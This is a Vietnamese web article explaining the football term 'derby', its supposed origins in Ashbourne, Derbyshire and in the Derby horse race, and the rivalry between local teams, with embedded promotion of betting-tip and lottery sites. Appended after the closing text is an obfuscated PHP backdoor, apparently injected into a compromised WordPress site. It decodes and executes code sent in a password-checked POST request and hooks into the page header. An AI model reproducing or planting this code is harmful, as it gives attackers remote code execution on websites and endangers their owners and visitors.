Derby là gì? Nguồn gốc ra đời và ý nghĩa của Derby

- Xem(569)

Derby là gì chắc hẳn rất nhiều bạn thắc mắc cũng như muốn tìm được đáp án chính xác. Và bài viết này sẽ mang đến thông tin rõ hơn về trận derby là gì.

Derby là gì?

Derby là từ phổ biến trong bóng đá nói riêng và thể thao nói chung, được hiểu là trận đấu giữa các đối thủ trong cùng khu vực, địa phương, thậm chí có thể là trong cả một quốc gia. Hầu hết các trận bóng đá derby đều diễn ra rất hấp dẫn và gay cấn bởi nó không chỉ là một trận đấu thông thường mà nó còn có nhiều điều thú vị khác.

Nguồn gốc ra đời và ý nghĩa của Derby

Nguồn gốc hình thành

Theo nhiều ý kiến, từ derby bắt nguồn từ vùng Ashbourne, Derbyshire, Anh. Vào thế kỷ 12, nơi đây thường diễn ra trận bóng Royal Shrovetide. Ở trận đấu đó, hai đội bóng từ hai đầu thị trấn sẽ gặp nhau và quyết đấu. Các trận đấu thường căng thẳng và gay cấn. Mỗi đội phải tìm cách đưa bóng vào khung thành đối phương. Hai khung thành chỉ cách nhau 30 km và một trong những luật chơi là cấm bạo lực không cần thiết. Các trận đấu thường được tổ chức tại các bữa tiệc trên khắp Vương quốc Anh và thậm chí được tổ chức Hàng năm tại Ashbourne.

Ngoài ra, cũng óc thuyết cho rằng từ derby là tên của một cuộc đua ngựa có nguồn gốc từ nước Anh. Cuộc đua được thành lập bởi Bá tước vùng Derby vào năm 1780. Kể từ đó, bắt đầu vào khoảng năm 1840, từ “derby” đã trở thành một từ tiếng Anh cho bất kỳ môn thể thao nào. Và một “Local Derby” đơn giản chỉ là một môn thể thao giữa các đối thủ cùng địa phương.

Dù có nguồn gốc như thế nào, chúng ta không thể phủ nhận rằng derby cho đến nay là một từ rất phổ biến và được nhiều người biết đến. Thuật ngữ này xuất hiện trong một bài báo trên tờ Daily Express số tháng 10 năm 1914. Nội dung của cụm từ có nội dung: “A local Derby between Liverpool and Everton, có thể hiểu là trận đấu derby giữa Liverpool và Everton. Từ đó, cụm từ này đã trở nên nổi tiếng và được sử dụng rộng rãi.

Derby là gì? Nguồn gốc ra đời và ý nghĩa của Derby

=> Lichthidau.com.vn cung cấp tin nhan dinh bong da hom nay, soi kèo bóng đá tối nay, dự đoán kết quả các trận đấu của hơn 1000+ giải đấu HOT trên thế giới chính xác và hoàn toàn miễn phí.

Ý nghĩa trận Derby

Khi mới ra đời, Derby chỉ là trận đấu giữa hai đội bóng cùng thành phố và địa phương. Mục đích của việc tổ chức là tăng thêm tính hấp dẫn và hào hứng cho một các trận đấu trong giải đấu cụ thể.

Nhưng cho đến nay, Derby còn được gắn với nhiều ý nghĩa khác khi nhắc đến thương mại và truyền thông. So với trước đây, trận Derby chỉ giới hạn trong các giải đấu quốc gia, thì hiện nay các giải đấu cấp châu lục và quốc tế trong thời kỳ này vẫn phổ biến. Xét cho cùng, sứ mệnh của các trận derby có tầm quan trọng to lớn đối với làng bóng đá.

Đặc điểm chung của các trận Derby

Tương tự với nhiều trận đấu khác trong bóng đá và các môn thể thao khác, tính cạnh tranh giữa 2 đội thi đấu trong trận Derby được thể hiện rõ ràng. Vì cả hai đội đều đến từ cùng một địa phương nên đội bóng giành chiến thắng cả về chuyên môn và ty le ca cuoc sẽ trở thành ông vua vùng đất đó. Ngoài ra, sự kịch tính trong các trận derby còn được góp phần bởi các cổ động viên yêu thích đội bóng đó.

Nếu các cầu thủ thông qua kết quả và phong cách thi đấu để thể hiện tính cạnh tranh trên sân bóng thì cách cổ vũ của người hâm mộ cũng nói lên điều này. Người hâm mộ bóng càng cuồng nhiệt hơn khi tình cảm họ dành cho đội bóng đá lớn. Hầu hết, người hâm mộ sẽ thấy ​​một trận derby diễn ra như một cuộc đối đầu giữa những đối thủ không đội trời chung.

Xem thêm: Trung vệ là gì? Nhiệm vụ chính của vị trí này khi trên sân đấu

Derby là gì và một số thông tin liên quan đã được https://xosochuan.net/ trình bày ở trên. Ngoài ra vẫn còn nhiều bài viết khác tương tự trận derby là gì sẽ được chúng tôi tiếp tục cập nhật tại chuyên mục tin bóng đá trong tương lai. 

"Hy vọng qua bài viết trên, bạn đã nhận được những thông tin hữu ích và đầy đủ để theo dõi và cổ vũ cho đội bóng mình yêu thích. Hãy thường xuyên truy cập để cập nhật những tin tức mới nhất về bóng đá. Bài viết này chỉ mang tính chất tham khảo. Chúc các bạn may mắn!"

to top if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}